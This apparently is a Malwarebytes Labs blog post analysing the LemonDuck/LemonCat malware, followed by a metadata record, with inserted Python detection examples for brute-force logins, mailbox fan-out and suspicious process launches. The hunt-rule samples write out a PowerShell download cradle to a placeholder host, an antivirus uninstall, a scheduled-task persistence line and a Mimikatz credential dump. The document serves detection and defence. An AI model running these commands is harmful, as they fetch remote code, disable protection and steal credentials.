[LemonDuck](<https://blog.malwarebytes.com/detections/trojan-lemonduck/>) has evolved from a Monero cryptominer into LemonCat, a Trojan that specializes in backdoor installation, credential and data theft, and malware delivery, according to the Microsoft 365 Defender Threat Intelligence Team, which explained their findings in a two-part story [[1](<https://www.microsoft.com/security/blog/2021/07/22/when-coin-miners-evolve-part-1-exposing-lemonduck-and-lemoncat-modern-mining-malware-infrastructure/>)][[2](<https://www.microsoft.com/security/blog/2021/07/29/when-coin-miners-evolve-part-2-hunting-down-lemonduck-and-lemoncat-attacks/>)] on the Microsoft Security blog.
### LemonDuck
Trojan.LemonDuck has always been an advanced cryptominer that is actively updated with new exploits and obfuscation tricks. Among other things, it tries to evade detection with a fileless miner. LemonDuck is also a cross-platform threat, which adds to the risk for enterprises: it is one of a few documented bot families that targets Linux systems as well as Windows devices. Trojan.LemonDuck uses several methods for the initial infection and to propagate across networks:
* Malspam: the email typically contains two files: a Word document exploiting [CVE-2017-8570](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8570>) and a zip archive containing a malicious JavaScript file.
* Server Message Block (SMB) vulnerabilities: Trojan.LemonDuck leverages [EternalBlue](<https://blog.malwarebytes.com/glossary/eternalblue/>) and the SMBGhost flaw (CVE-2020-0796) to compromise a host as well as to propagate to other machines within a network.
* RDP brute-forcing: Trojan.LemonDuck’s [RDP](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2020/10/brute-force-attacks-increasing/>) module scans for servers listening on port 3389 and tries to log in as the user ‘administrator’ with passwords from a list.
* SSH brute-forcing: the Linux equivalent of the RDP attacks. Trojan.LemonDuck scans for machines listening on port 22 and brute-forces the ‘root’ user name with a list of passwords.
* LNK vulnerability: leverages [CVE-2017-8464](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8464>) via USB removable drives that contain a malicious .LNK file. The flaw triggers when Windows Explorer parses the shortcut, so merely browsing the drive is enough on an unpatched system.
* [ProxyLogon](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/03/proxylogon-poc-becomes-a-game-of-whack-a-mole/>): an exploit chain for Microsoft Exchange Server that allows an unauthenticated attacker to execute arbitrary commands on vulnerable servers.
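As an added example (not from the post and not LemonDuck code), this is the detection logic a defender would run against the SSH brute-force pattern described above: a sliding-window count of failed logins for a fixed account name from one source, with a second alert when that same source later succeeds. The sshd log lines, the thresholds and the 2021 year used to complete the syslog timestamps are constructed assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# OpenSSH auth.log line: syslog prefix without a year (as on most distributions).
_SSHD_LINE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) \w+ for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<src>[\d.]+) port \d+ ssh2"
)


def parse_sshd_line(line, year=2021):
    """Return {ts, ok, user, src} for a password/publickey auth line, else None."""
    m = _SSHD_LINE.match(line)
    if m is None:
        return None
    ts = datetime.strptime("%d %s" % (year, m["ts"]), "%Y %b %d %H:%M:%S")
    return {"ts": ts, "ok": m["result"] == "Accepted",
            "user": m["user"].lower(), "src": m["src"]}


def detect_bruteforce(lines, threshold=5, window_s=60, targets=("root", "administrator")):
    """Sliding-window brute-force detector.

    Emits ("bruteforce", src, user, ts) when `threshold` failures for one of the
    `targets` accounts arrive from one source within `window_s` seconds, and
    ("success_after_bruteforce", ...) if that source later authenticates as that
    account, which is the outcome that matters for incident response.
    """
    failures = defaultdict(deque)   # (src, user) -> failure timestamps inside the window
    flagged, alerts = set(), []
    for line in lines:
        ev = parse_sshd_line(line)
        if ev is None or ev["user"] not in targets:
            continue
        key = (ev["src"], ev["user"])
        if ev["ok"]:
            if key in flagged:
                alerts.append(("success_after_bruteforce", ev["src"], ev["user"], ev["ts"]))
            continue
        q = failures[key]
        q.append(ev["ts"])
        while (ev["ts"] - q[0]).total_seconds() > window_s:   # expire old failures
            q.popleft()
        if len(q) >= threshold and key not in flagged:
            flagged.add(key)
            alerts.append(("bruteforce", ev["src"], ev["user"], ev["ts"]))
    return alerts


# Constructed sample (TEST-NET addresses); not a real log.
SAMPLE_AUTH_LOG = """\
Jul 29 10:00:01 web01 sshd[2210]: Failed password for root from 198.51.100.7 port 40122 ssh2
Jul 29 10:00:03 web01 sshd[2211]: Failed password for root from 198.51.100.7 port 40130 ssh2
Jul 29 10:00:04 web01 sshd[2213]: Failed password for invalid user admin from 203.0.113.9 port 5100 ssh2
Jul 29 10:00:06 web01 sshd[2214]: Failed password for root from 198.51.100.7 port 40141 ssh2
Jul 29 10:00:08 web01 sshd[2215]: Failed password for root from 198.51.100.7 port 40152 ssh2
Jul 29 10:00:09 web01 sshd[2216]: Failed password for root from 198.51.100.7 port 40160 ssh2
Jul 29 10:00:15 web01 sshd[2220]: Accepted password for root from 198.51.100.7 port 40177 ssh2
Jul 29 10:05:00 web01 sshd[2300]: Accepted publickey for alice from 10.0.0.12 port 50001 ssh2
""".splitlines()

if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_AUTH_LOG):
        print(alert)
```

The same loop covers the RDP side: feed it Windows Security event 4625 (failed logon) records with LogonType 10, keyed on IpAddress and TargetUserName, and watch for a 4624 from the same source afterwards.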
LemonDuck does not limit itself to new or popular vulnerabilities. It keeps using older ones, which benefits the attackers when defenders focus on patching the vulnerability of the day rather than on investigating compromise. Notably, LemonDuck removes other attackers from a compromised device by getting rid of competing malware, and it prevents new infections by patching the very vulnerabilities it used to gain access.
### History
The earliest documentation of LemonDuck was from its cryptocurrency campaigns in May 2019. It was named after the variable “Lemon_Duck” it utilized in one of the PowerShell scripts that employed additional scripts kicked off by a scheduled task. The task was used to bring in the [PCASTLE](<https://securityintelligence.com/news/fileless-attack-campaign-leverages-pcastle-to-distribute-xmrig-monero-mining-malware/>) tool to achieve a couple of goals: abuse the EternalBlue SMB exploit, as well as use brute force or pass-the-hash to move laterally and begin the operation again. Many of these behaviors are still observed in LemonDuck campaigns today.
### Evolution
In 2021, LemonDuck campaigns started using more diversified command and control (C2) infrastructure and tools. This update supported a marked increase in manual post-breach activity, adapted to the perceived value of the compromised device to the attackers. That does not mean the old infrastructure was abandoned: it is hosted with bulletproof hosting providers, which are unlikely to take any part of the LemonDuck infrastructure offline even when it is reported for malicious activity. This allows LemonDuck to persist and continue to be a threat.
### LemonCat
LemonCat was named as such after two domains with the word “cat” in them (sqlnetcat[.]com, netcatkit[.]com) that LemonDuck started using in January 2021. The infrastructure that includes those domains was used in attacks exploiting vulnerabilities in Microsoft Exchange Server. These attacks typically result in backdoor installation, credential and data theft, and malware delivery. It is often seen delivering the malware [Ramnit](<https://blog.malwarebytes.com/detections/worm-ramnit/>).
Once inside a system with an Outlook mailbox, LemonDuck attempts to run a script that uses the credentials present on the device. The script instructs the mailbox to send copies of a phishing message with preset text and attachments to all contacts. This bypasses many email security policies, for example those that skip scanning of internal mail or that only flag messages from suspicious or unknown senders. After the emails are sent, the malware removes all traces of the activity, so to the user it looks as if nothing was sent. This method of self-spreading is attempted on any affected device that has a mailbox, regardless of whether it is an Exchange server.
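Added example (not from the post): fan-out detection for the self-spreading described above, run over constructed rows that use a subset of the real Exchange message-tracking-log column names. It flags an internal sender whose single subject reaches many distinct recipients in a short window, which is what the mailbox script produces. The threshold, the window, keying on RECEIVE rows (the mailbox submitting the message) and the corp.example domain are assumptions to adapt to your environment.

```python
import csv
import io
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample using a subset of the Exchange message-tracking-log columns;
# these rows are not real logs. recipient-address is ';'-separated, as in Exchange.
SAMPLE_TRACKING_LOG = """\
date-time,event-id,sender-address,recipient-address,recipient-count,message-subject
2021-07-29T09:12:01.000Z,RECEIVE,bob@corp.example,alice@corp.example,1,Re: Q3 budget
2021-07-29T09:30:10.000Z,RECEIVE,carol@corp.example,dave@corp.example;erin@corp.example;frank@corp.example,3,Payment invoice
2021-07-29T09:30:12.000Z,RECEIVE,carol@corp.example,grace@corp.example;heidi@corp.example,2,Payment invoice
2021-07-29T09:30:15.000Z,RECEIVE,carol@corp.example,ivan@corp.example;judy@corp.example;mallory@corp.example,3,Payment invoice
2021-07-29T09:30:20.000Z,RECEIVE,carol@corp.example,vendor@partner.example,1,Payment invoice
2021-07-29T11:00:00.000Z,RECEIVE,carol@corp.example,bob@corp.example,1,Lunch?
2021-07-29T12:00:00.000Z,RECEIVE,hr@corp.example,all-staff@corp.example,1,Holiday schedule
"""


def parse_rows(text):
    """Parse tracking-log CSV text into dicts with a datetime and a recipient list."""
    rows = []
    for r in csv.DictReader(io.StringIO(text)):
        ts = datetime.strptime(r["date-time"], "%Y-%m-%dT%H:%M:%S.%fZ")
        rcpts = [x.strip().lower() for x in r["recipient-address"].split(";") if x.strip()]
        rows.append({"ts": ts, "event": r["event-id"], "sender": r["sender-address"].lower(),
                     "rcpts": rcpts, "subject": r["message-subject"]})
    return rows


def detect_mailbox_fanout(rows, threshold=8, window=timedelta(minutes=10),
                          internal_domain="corp.example"):
    """Flag (sender, subject) pairs whose distinct-recipient count reaches `threshold`
    inside `window`. Only internal senders are considered: the technique sends from the
    compromised mailbox, which is exactly why sender-based allow rules let it through."""
    buckets = defaultdict(list)            # (sender, subject) -> [(ts, recipient)]
    for r in rows:
        if r["event"] != "RECEIVE" or not r["sender"].endswith("@" + internal_domain):
            continue
        for rcpt in r["rcpts"]:
            buckets[(r["sender"], r["subject"])].append((r["ts"], rcpt))
    alerts = []
    for (sender, subject), events in buckets.items():
        events.sort()
        seen = {}                          # recipient -> last time it was mailed
        for ts, rcpt in events:
            seen[rcpt] = ts
            seen = {k: v for k, v in seen.items() if ts - v <= window}   # slide the window
            if len(seen) >= threshold:
                alerts.append({"sender": sender, "subject": subject,
                               "recipients": len(seen), "first_seen": events[0][0]})
                break
    return alerts


if __name__ == "__main__":
    for alert in detect_mailbox_fanout(parse_rows(SAMPLE_TRACKING_LOG)):
        print(alert)
```

A message to a distribution list counts as one recipient here; the EXPAND event in the tracking log shows the real fan-out, so include it if your tenant relies on lists.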
### Human and automated infiltration
Automated infections, like the ones from malspam, launch a PowerShell script that pulls additional scripts from the [C&C server](<https://blog.malwarebytes.com/glossary/cc/>). One of the first steps the infection takes once it has gained persistence is to disable or remove a series of security products, including Microsoft Defender for Endpoint, ESET, Kaspersky, Avast, Norton Security, and Malwarebytes. It also attempts to uninstall any product with “Security” or “AntiVirus” in its name.
From here the methods vary based on how attractive the target is. LemonDuck leverages a wide range of free and open-source penetration testing tools. It uses a script at installation, and repeatedly thereafter, to scan for ports and perform network reconnaissance. It then attempts to log on to adjacent devices to push the initial LemonDuck execution scripts. Another tool dropped and used within this lateral movement component is a bundled Mimikatz, in a file named mimi.dat that is associated with both the “Cat” and “Duck” infrastructures. Its function is to facilitate credential theft for further actions. The most common name for the infection script is IF.Bin. Alongside credential theft, IF.Bin drops additional .BIN files that attempt common exploits such as [CVE-2017-8464](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8464>) to escalate privileges.
At installation and repeatedly afterward, LemonDuck goes to great lengths to remove all other botnets, miners, and competitor malware from the device. It does this via a script called KR.Bin. This script attempts to remove the services, network connections, and other traces of dozens of competitor malware families via scheduled tasks. It also closes well-known mining ports and removes popular mining services to preserve system resources for itself. The script even removes the mining service it intends to use and simply reinstalls it afterward with its own configuration.
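Added example (not from the post; the sample command lines are constructed and are not LemonDuck's actual commands): a small rule set run over process-creation records, such as Sysmon event 1 or Security event 4688 with command-line logging enabled, for the behaviours described in this section: a PowerShell download cradle pulling further scripts, uninstalling products named “Security” or “AntiVirus”, scheduled tasks that launch script interpreters, and the mimi.dat Mimikatz bundle. Rule names and regexes are assumptions; tune them against your own baseline before alerting on them.

```python
import re

_AV = r"(security|antivirus|anti-virus|defender|malwarebytes|kaspersky|eset|avast|norton)"

# (rule name, regex the Image must match or None, regex the CommandLine must match)
RULES = [
    ("ps_download_cradle",
     re.compile(r"powershell|pwsh", re.I),
     re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient"
                r"|Invoke-Expression|\bIEX\b", re.I)),
    ("av_uninstall",
     re.compile(r"wmic|msiexec|powershell|pwsh|cmd", re.I),
     re.compile(r"uninstall.*" + _AV + r"|" + _AV + r".*uninstall|Set-MpPreference\s+-Disable", re.I)),
    ("schtasks_script_persistence",
     re.compile(r"schtasks", re.I),
     re.compile(r"/create.*(/tr|/xml).*(powershell|pwsh|cmd\.exe|wscript|cscript|mshta|\.bin\b)",
                re.I | re.S)),
    ("mimikatz_artifact",
     None,
     re.compile(r"mimi\.dat|sekurlsa::|privilege::debug", re.I)),
]


def hunt(events):
    """Return [(event_index, rule_name)] for every rule that fires on each event."""
    hits = []
    for i, ev in enumerate(events):
        for name, image_re, cmd_re in RULES:
            if image_re is not None and not image_re.search(ev["Image"]):
                continue
            if cmd_re.search(ev["CommandLine"]):
                hits.append((i, name))
    return hits


# Constructed process-creation records (TEST-NET address); not real telemetry.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -nop -w hidden -ep bypass -c \"IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://198.51.100.20/stage2.ps1')\""},
    {"Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": "wmic product where \"name like '%Security%' or name like '%AntiVirus%'\""
                    " call uninstall /nointeractive"},
    {"Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": "schtasks /create /ru system /sc MINUTE /mo 60 /tn \"Update\""
                    " /tr \"powershell -nop -w hidden -c IEX(...)\" /F"},
    {"Image": r"C:\Users\Public\m.exe",
     "CommandLine": r'"C:\Users\Public\m.exe" privilege::debug sekurlsa::logonpasswords exit'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -Command Get-Process"},
    {"Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r"msiexec /i C:\Users\Public\report_viewer.msi /qn"},
]

if __name__ == "__main__":
    for idx, rule in hunt(SAMPLE_EVENTS):
        print(idx, rule, SAMPLE_EVENTS[idx]["CommandLine"][:60])
```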
### Mitigation
Some specific and more general mitigation techniques:
* Disallow removable storage devices on sensitive endpoints, or at least disable autorun. Note that disabling autorun alone does not stop the LNK attack: CVE-2017-8464 triggers when Explorer renders the shortcut, so the patch is what closes it.
* Make sure your systems are fully patched and protected against brute-force attacks aimed at popular services like SMB, SSH, RDP, SQL, and others.
* Turn on [tamper protection](<https://support.malwarebytes.com/hc/en-us/articles/360038990513-Configure-Tamper-Protection-options-in-Malwarebytes-Nebula>) so malware can’t disable or uninstall your anti-malware.
* Do not disable detection for potentially unwanted programs (PUPs) since some anti-malware classifies crypto-miners as potentially unwanted.
* Block connections to known malicious domains and IP addresses.
* Review email scanning rules that are based on allowed sender addresses, since this malware sends from compromised, trusted mailboxes.
Stay safe, everyone!
The post [LemonDuck no longer settles for breadcrumbs](<https://blog.malwarebytes.com/botnets/2021/07/lemonduck-no-longer-settles-for-breadcrumbs/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).
{"id": "MALWAREBYTES:3067D03AD5A4441FEBB702BADFD6C4A1", "type": "malwarebytes", "bulletinFamily": "blog", "title": "LemonDuck no longer settles for breadcrumbs", "description": "[LemonDuck](<https://blog.malwarebytes.com/detections/trojan-lemonduck/>) has evolved from a Monero cryptominer into LemonCat, a Trojan that specializes in backdoor installation, credential and data theft, and malware delivery, according to the Microsoft 365 Defender Threat Intelligence Team, which explained their findings in a two-part story [[1](<https://www.microsoft.com/security/blog/2021/07/22/when-coin-miners-evolve-part-1-exposing-lemonduck-and-lemoncat-modern-mining-malware-infrastructure/>)][[2](<https://www.microsoft.com/security/blog/2021/07/29/when-coin-miners-evolve-part-2-hunting-down-lemonduck-and-lemoncat-attacks/>)] on the Microsoft Security blog. \n\n### LemonDuck\n\nTrojan.LemonDuck has always been an advanced cryptominer that is actively being updated with new exploits and obfuscation tricks. Among others, it aims to evade detection with its fileless miner. LemonDuck\u2019s threat to enterprises is also the fact that it\u2019s a cross-platform threat. It\u2019s one of a few documented bot families that targets Linux systems as well as Windows devices. 
Trojan.LemonDuck uses several methods for the initial infection and to propagate across networks:\n\n * Malspam: the email typically contains two files: a Word document exploiting [CVE-2017-8570](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8570>) and a zip archive with a malicious JavaScript.\n * Server Message Block (SMB) vulnerabilities: Trojan.LemonDuck leverages [EternalBlue](<https://blog.malwarebytes.com/glossary/eternalblue/>) and the SMBGhost flaw to compromise a host as well as propagate to other machines within a network.\n * RDP brute-forcing: Trojan.LemonDuck\u2019s [RDP](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2020/10/brute-force-attacks-increasing/>) module scans for servers listening on port 3389 and tries to login as user \u2018administrator\u2019 from a list of passwords.\n * SSH brute-forcing: the Linux equivalent of RDP attacks. Trojan.LemonDuck scans for machines that are listening on port 22 and performs a brute-force attack using a list of passwords combined with the \u2018root\u2019 user name.\n * LNK vulnerability: leverages the vulnerability [CVE-2017-8464](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8464>) via USB removable drive that contain a malicious .LNK file.\n * [ProxyLogon](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/03/proxylogon-poc-becomes-a-game-of-whack-a-mole/>): an exploit for Exchange servers that allows an unauthenticated attacker to execute arbitrary commands onto vulnerable servers.\n\nLemonDuck does not just limit itself to new or popular vulnerabilities. It continues to use older vulnerabilities, which benefit the attackers at times when focus shifts to patching a popular vulnerability rather than investigating compromise. 
Notably, LemonDuck removes other attackers from a compromised device by getting rid of competing malware and preventing any new infections by patching the same vulnerabilities it used to gain access.\n\n### History\n\nThe earliest documentation of LemonDuck was from its cryptocurrency campaigns in May 2019. It was named after the variable \u201cLemon_Duck\u201d it utilized in one of the PowerShell scripts that employed additional scripts kicked off by a scheduled task. The task was used to bring in the [PCASTLE](<https://securityintelligence.com/news/fileless-attack-campaign-leverages-pcastle-to-distribute-xmrig-monero-mining-malware/>) tool to achieve a couple of goals: abuse the EternalBlue SMB exploit, as well as use brute force or pass-the-hash to move laterally and begin the operation again. Many of these behaviors are still observed in LemonDuck campaigns today.\n\n### Evolution\n\nIn 2021, LemonDuck campaigns started using more diversified command and control (C2) infrastructure and tools. This update supported the marked increase in manual post-breach involvement, which was adapted depending on the perceived value of compromised devices to the attackers. Which does not mean it stopped using the old infrastructure based on bulletproof hosting providers, which are unlikely to take any part of the LemonDuck infrastructure offline even when they are reported for malicious actions. This allows LemonDuck to persist and continue to be a threat.\n\n### LemonCat\n\nLemonCat was named as such after two domains with the word \u201ccat\u201d in them (sqlnetcat[.]com, netcatkit[.]com) that LemonDuck started using in January 2021. The infrastructure that includes those domains was used in attacks exploiting vulnerabilities in Microsoft Exchange Server. These attacks typically result in backdoor installation, credential and data theft, and malware delivery. 
It is often seen delivering the malware [Ramnit](<https://blog.malwarebytes.com/detections/worm-ramnit/>).\n\nOnce inside a system with an Outlook mailbox, LemonDuck attempts to run a script that utilizes the credentials present on the device. The script instructs the mailbox to send copies of a phishing message with preset messages and attachments to all contacts. This bypasses many email security policies, for example those that forgo scanning internal mail or those that determine if an email is sent from a suspicious or unknown sender. After the emails are sent, the malware removes all traces of such activity, making it appear to the user as if nothing was sent. This method of self-spreading is attempted on any affected device that has a mailbox, regardless of whether it is an Exchange server.\n\n### Human and automated infiltration\n\nAutomated infections, like the ones from malspam, launch a PowerShell script that pulls additional scripts from the [C&C server](<https://blog.malwarebytes.com/glossary/cc/>). One of the first steps the infection tries once it has gained persistence is to disable or remove a series of security products like Microsoft Defender for Endpoint, Eset, Kaspersky, Avast, Norton Security, and Malwarebytes. They also attempt to uninstall any product with \u201cSecurity\u201d and \u201cAntiVirus\u201d in the name.\n\nFrom here the methods vary based on how attractive the target is. LemonDuck leverages a wide range of free and open-source penetration testing tools. LemonDuck uses a script at installation and then repeatedly thereafter to scan for ports and perform network reconnaissance. It then attempts to log onto adjacent devices to push the initial LemonDuck execution scripts. Another tool dropped and utilized within this lateral movement component is a bundled Mimikatz, within a mimi.dat file associated with both the \u201cCat\u201d and \u201cDuck\u201d infrastructures. 
This tool\u2019s function is to facilitate credential theft for additional actions. The most common name for the infection script is IF.Bin. In conjunction with credential theft, IF.Bin drops additional .BIN files to attempt common service exploits like [CVE-](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8464>)[2](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8464>)[017-8464](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8464>) to increase privilege.\n\nAt installation and repeatedly afterward, LemonDuck takes great lengths to remove all other botnets, miners, and competitor malware from the device. It does this via a script called KR.Bin. This script attempts to remove services, network connections, and other evidence from dozens of competitor malware via scheduled tasks. It also closes well-known mining ports and removes popular mining services to preserve system resources. The script even removes the mining service it intends to use and simply reinstalls it afterward with its own configuration.\n\n### Mitigation\n\nSome specific and more general mitigation techniques:\n\n * Disallow removable storage devices on sensitive endpoints or at least disable autorun.\n * Make sure your systems are fully patched and protected against brute-force attacks aimed at popular services like SMB, SSH, RDP, SQL, and others.\n * Turn on [tamper protection](<https://support.malwarebytes.com/hc/en-us/articles/360038990513-Configure-Tamper-Protection-options-in-Malwarebytes-Nebula>) so malware can\u2019t disable or uninstall your anti-malware.\n * Do not disable detection for potentially unwanted programs (PUPs) since some anti-malware classifies crypto-miners as potentially unwanted.\n * Block connections to known malicious domains and IP addresses.\n * Review your email scanning rules that are based on allowed sender addresses, since this malware can use trusted sender addresses.\n\nStay safe, everyone!\n\nThe post [LemonDuck no longer settles for 
breadcrumbs](<https://blog.malwarebytes.com/botnets/2021/07/lemonduck-no-longer-settles-for-breadcrumbs/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "published": "2021-07-30T17:19:31", "modified": "2021-07-30T17:19:31", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, "href": "https://blog.malwarebytes.com/botnets/2021/07/lemonduck-no-longer-settles-for-breadcrumbs/", "reporter": "Pieter Arntz", "references": [], "cvelist": ["CVE-2017-8464", "CVE-2017-8570"], "immutableFields": [], "lastseen": "2021-07-30T18:34:23", "viewCount": 358, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:01414FF4-26B2-4222-97E5-C5371A16E182", "AKB:CC1AB90B-52E1-444F-A6F4-1F3F95B15460"]}, {"type": "canvas", "idList": ["OFFICE_WSDL", "SPECIAL_LNK"]}, {"type": "cert", "idList": ["VU:824672"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0477", "CPAI-2017-0725"]}, {"type": "cisa", "idList": ["CISA:5FE14EDE9F5E20EB9536DC356A82AAB6", "CISA:D70586B2C2D5D982D54DA686CCF0F4D1"]}, {"type": 
"cve", "idList": ["CVE-2017-0243", "CVE-2017-8464", "CVE-2017-8570"]}, {"type": "exploitdb", "idList": ["EDB-ID:42382", "EDB-ID:42429", "EDB-ID:44263"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:20DF492E20233C084EF3A6265A4CB16A", "EXPLOITPACK:26C6702FE71DE1FE3096B330AA74AD07", "EXPLOITPACK:773C207F8B68CF5AB40483F3A9751D81"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170616-01-WINDOWS"]}, {"type": "kaspersky", "idList": ["KLA11039", "KLA11046", "KLA11069", "KLA11842"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT-WINDOWS-FILEFORMAT-CVE_2017_8464_LNK_RCE-", "MSF:EXPLOIT-WINDOWS-LOCAL-CVE_2017_8464_LNK_LPE-"]}, {"type": "mmpc", "idList": ["MMPC:4A6B394DCAF12E05136AE087248E228C", "MMPC:E537BA51663A720821A67D2A4F7F7F0E"]}, {"type": "mscve", "idList": ["MS:CVE-2017-8464", "MS:CVE-2017-8570"]}, {"type": "mskb", "idList": ["KB3213545", "KB3213555", "KB3213624", "KB3213640", "KB4021903"]}, {"type": "mssecure", "idList": ["MSSECURE:4A6B394DCAF12E05136AE087248E228C", "MSSECURE:A133B2DDF50F8BE904591C1BB592991A", "MSSECURE:E537BA51663A720821A67D2A4F7F7F0E"]}, {"type": "myhack58", "idList": ["MYHACK58:62201787021", "MYHACK58:62201788412", "MYHACK58:62201788439", "MYHACK58:62201788476", "MYHACK58:62201788542", "MYHACK58:62201890088", "MYHACK58:62201994516"]}, {"type": "nessus", "idList": ["SMB_NT_MS17_JUL_OFFICE.NASL", "SMB_NT_MS17_JUN_4022714.NASL", "SMB_NT_MS17_JUN_4022715.NASL", "SMB_NT_MS17_JUN_4022719.NASL", "SMB_NT_MS17_JUN_4022724.NASL", "SMB_NT_MS17_JUN_4022725.NASL", "SMB_NT_MS17_JUN_4022726.NASL", "SMB_NT_MS17_JUN_4022727.NASL", "SMB_NT_MS17_JUN_4025685_VISTA.NASL", "SMB_NT_MS17_JUN_WIN2008.NASL", "SMB_NT_MS17_JUN_WINDOWS8.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310108777", "OPENVAS:1361412562310810903", "OPENVAS:1361412562310811154", "OPENVAS:1361412562310811159", "OPENVAS:1361412562310811164", "OPENVAS:1361412562310811165", "OPENVAS:1361412562310811167", "OPENVAS:1361412562310811168", "OPENVAS:1361412562310811171", 
"OPENVAS:1361412562310811173", "OPENVAS:1361412562310811178", "OPENVAS:1361412562310811196", "OPENVAS:1361412562310811208", "OPENVAS:1361412562310811231", "OPENVAS:1361412562310811232", "OPENVAS:1361412562310811233", "OPENVAS:1361412562310811451"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:143623", "PACKETSTORM:144927"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4", "QUALYSBLOG:E752DE2F12FECA2E217194D510424325"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:4FC64923DC47E63250AA753E591FC7A7", "RAPID7COMMUNITY:5EEA40487C97CFD1AC5560D7EB4368F6"]}, {"type": "securelist", "idList": ["SECURELIST:11665FFD7075FB9D59316195101DE894", "SECURELIST:376CB760FDD4E056A8D0695A9EB9756A", "SECURELIST:4FE9AF32AEB194433587B75288D50FDA", "SECURELIST:73735B62C781261398E44FFF82262BCD", "SECURELIST:78FB952921DD97BAF55DA33811CB6FE4", "SECURELIST:82490B192CB8F0CC0E1B0205E044FDB8", "SECURELIST:A2A995C1C898D3DA4DB008FBA6AA149E", "SECURELIST:A3CEAF1114E104F14254F7AF77D7D080", "SECURELIST:BB0230F9CE86B3F1994060AA0A809C08", "SECURELIST:C540EBB7FD8B7FB9E54E119E88DB5C48", "SECURELIST:CE954DA57A5EE857B62F0E00D36A5003", "SECURELIST:D0FFA6E46D43B7A592C34676F2EF3EDB", "SECURELIST:D7795824A5A02E1E45E51294D78CEBC2", "SECURELIST:FD71ACDBBCF57BD4C7DE182D2309BF9D"]}, {"type": "symantec", "idList": ["SMNTC-98818", "SMNTC-99445"]}, {"type": "talosblog", "idList": ["TALOSBLOG:212BF0D0902B16A1E3C6ABB19FCEB336", "TALOSBLOG:7FDC117533451294884ABE03F31ED36B", "TALOSBLOG:E17B2B34420CA9C9A1CD5E1FE7980D8C"]}, {"type": "thn", "idList": ["THN:4220A2AF1052C7831C6C2F36BFA4CD47", "THN:6885760BEEB9A6CBDFB108443DDF540C"]}, {"type": "threatpost", "idList": ["THREATPOST:15B0A575618A05410227B72FFBBC216F", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:55583CEEB1DA64162FA6CCA7B37CB1BB", "THREATPOST:A79D567955CD3BD88909060ECB743C9F", "THREATPOST:BA70A6314CF0FB9F4A69C5BB4F1D6BC0", 
